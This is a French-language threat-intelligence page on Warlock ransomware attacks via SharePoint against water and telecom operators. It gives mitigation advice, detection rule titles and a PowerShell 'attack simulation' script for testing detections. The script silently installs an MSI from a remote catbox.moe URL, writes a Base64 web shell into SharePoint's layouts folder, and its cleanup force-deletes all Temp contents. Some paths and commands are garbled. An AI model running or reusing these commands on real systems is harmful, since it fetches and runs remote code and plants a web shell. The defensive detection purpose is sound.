SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Les Attaques du Rançongiciel Warlock sur les Infrastructures Critiques de l’Eau et des Télécommunications

Author Photo
SOC Prime Team linkedin icon Suivre
Les Attaques du Rançongiciel Warlock sur les Infrastructures Critiques de l’Eau et des Télécommunications
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Un acteur menaçant lié à la Chine, suivi sous le nom de Longlegs, déploie le ransomware Warlock en exploitant des vulnérabilités de Microsoft SharePoint. Le groupe utilise une chaîne d’exploitation ToolShell pour l’accès initial avant de se déplacer latéralement à travers les réseaux compromis. Les attaquants appliquent également des techniques d’évasion avancées, notamment en abusant de pilotes vulnérables pour désactiver les logiciels de sécurité et en utilisant des services cloud légitimes pour la livraison de charges utiles.

Enquête

L’enquête a retracé une activité allant de l’exploitation initiale de SharePoint au déploiement d’un webshell dans le répertoire LAYOUTS. Les analystes ont observé des clés machine ASP.NET forgées utilisées pour l’exécution de code à distance et un ransomware mis en scène dans le partage SYSVOL pour une distribution à l’échelle du domaine. La chaîne d’attaque impliquait également le chargement de DLL et l’abus de la fonctionnalité de tunneling de Visual Studio Code pour un accès persistant.

Atténuation

Les organisations devraient donner la priorité au correctif du serveur Microsoft SharePoint pour remédier aux vulnérabilités connues de ToolShell. L’application de contrôles stricts sur les pilotes signés mais vulnérables peut aider à prévenir les attaques BYOVD. Les équipes de sécurité devraient également surveiller l’utilisation anormale des outils de type « living-off-the-land » et restreindre l’accès au partage SYSVOL pour les activités non administratives afin de réduire les mouvements latéraux et le déploiement de ransomwares.

Réponse

Lorsque des activités malveillantes sont détectées, les intervenants en cas d’incident devraient isoler les serveurs SharePoint affectés et inspecter le partage SYSVOL pour détecter des scripts ou binaires non autorisés. Effectuer un audit complet des comptes de domaine, en se concentrant sur les ajouts non autorisés au groupe administrateurs locaux. Vérifier le trafic réseau pour les connexions sortantes vers des services de partage de fichiers tels que catbox.moe ou wasabisys.com utilisés pour le staging des charges utiles.

Flux d’attaque

Détections

Ajouter un utilisateur aux administrateurs locaux (via la ligne de commande)

Équipe de SOC Prime
05 oct. 2026

Téléchargement ou Envoi via Powershell (via la ligne de commande)

Équipe de SOC Prime
05 oct. 2026

Chaînes Powershell suspectes (via la ligne de commande)

Équipe de SOC Prime
05 oct. 2026

Appel de classes/méthodes .NET suspectes depuis une ligne de commande PowerShell (via la création de processus)

Équipe de SOC Prime
05 oct. 2026

Découverte possible de partages réseau (via la ligne de commande)

Équipe de SOC Prime
05 oct. 2026

Découverte suspecte de relations de confiance de domaine (via la ligne de commande)

Équipe de SOC Prime
05 oct. 2026

Tentative possible d’installation de fichier MSI à distance (via la ligne de commande)

Équipe de SOC Prime
05 oct. 2026

Exécution suspecte depuis un profil utilisateur public (via la création de processus)

Équipe de SOC Prime
05 oct. 2026

Chaînes Powershell suspectes (via powershell)

Équipe de SOC Prime
05 oct. 2026

Appel de méthodes .NET suspectes depuis PowerShell (via powershell)

Équipe de SOC Prime
05 oct. 2026

Création possible de Webshell dans les répertoires Microsoft Exchange / SharePoint (via événement fichier)

Équipe de SOC Prime
05 oct. 2026

Fichiers suspects dans un profil utilisateur public (via événement fichier)

Équipe de SOC Prime
05 oct. 2026

Infiltration/exfiltration de données possible / C2 via des services/outils tiers (via proxy)

Équipe de SOC Prime
05 oct. 2026

Infiltration/exfiltration de données possible / C2 via des services/outils tiers (via dns)

Équipe de SOC Prime
05 oct. 2026

Commande et contrôle suspects par requête à un domaine d’interactions hors bande (via dns)

Équipe de SOC Prime
05 oct. 2026

IOCs (HashSha256) à détecter : Attaquants de ransomware Warlock ciblent des opérateurs de l’eau et des télécommunications

Règles IA de SOC Prime
05 oct. 2026

Détection de commande PowerShell malveillante pour l’exécution de code [Windows Powershell]

Règles IA de SOC Prime
05 oct. 2026

Mise en scène et exécution du ransomware Warlock via des partages réseau [Événement fichier Windows]

Règles IA de SOC Prime
05 oct. 2026

Indicateurs de ransomware Warlock sur les serveurs SharePoint [Création de processus Windows]

Règles IA de SOC Prime
05 oct. 2026

Exécution de simulation

Prérequis : La vérification pré-vol des télémétries et de la base de référence doit avoir été réussie.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront une mauvaise interprétation.

  • Narratif & Commandes d’Attaque : L’adversaire vise à déployer le ransomware Warlock sur un serveur SharePoint. L’attaque commence par utiliser msiexec pour récupérer un MSI malveillant à partir d’un domaine contrôlé par l’attaquant à distance (catbox.moe). Suite à l’accès initial, l’attaquant utilise PowerShell pour écrire une web shell ASPX malveillante dans le SharePoint chemind'accès layout2sp.aspx en utilisant une charge utile codée en Base64 pour contourner les filtres de chaîne simples. Enfin, l’attaquant tente de charger un assembly .NET malveillant directement en mémoire à l’aide de System.Workflow.ComponentModel pour exécuter du code sans laisser d’empreinte sur le disque.

  • Script de Test de Régression :

    # Script de Simulation de Ransomware Warlock
    # REMARQUE : Ce script est à utiliser uniquement à des fins de test autorisées.
    
    Write-Host "[!] Démarrage de la simulation de ransomware Warlock..." -ForegroundColor Red
    
    # 1. Simuler le téléchargement MSIEXEC à distance (Sélection 3)
    Write-Host "[*] Simulation du téléchargement de la charge utile à distance via MSIEXEC..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Simuler la dépose de Web Shell ASPX via PowerShell (Sélection 1)
    # Nous utilisons exactement la chaîne de la règle pour garantir la détection
    Write-Host "[*] Simulation de la dépose de web shell via PowerShell en Base64..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Simuler le chargement réflexif d'assemblage (Sélection 2)
    Write-Host "[*] Simulation du chargement réflexif d'assemblage..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Commandes de simulation envoyées." -ForegroundColor Green
  • Commandes de Nettoyage :

    # Script de nettoyage pour supprimer tous les artefacts créés pendant la simulation
    Write-Host "[!] Nettoyage des artefacts de simulation..." -ForegroundColor Yellow
    
    # Supprimer les fichiers simulés (Remarque : dans un vrai test, vous cibleriez les chemins spécifiques créés)
    # Étant donné que nous avons utilisé des chaînes factices, nous nous assurons principalement qu'aucun fichier malveillant réel n'a été déposé.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Nettoyage terminé." -ForegroundColor Green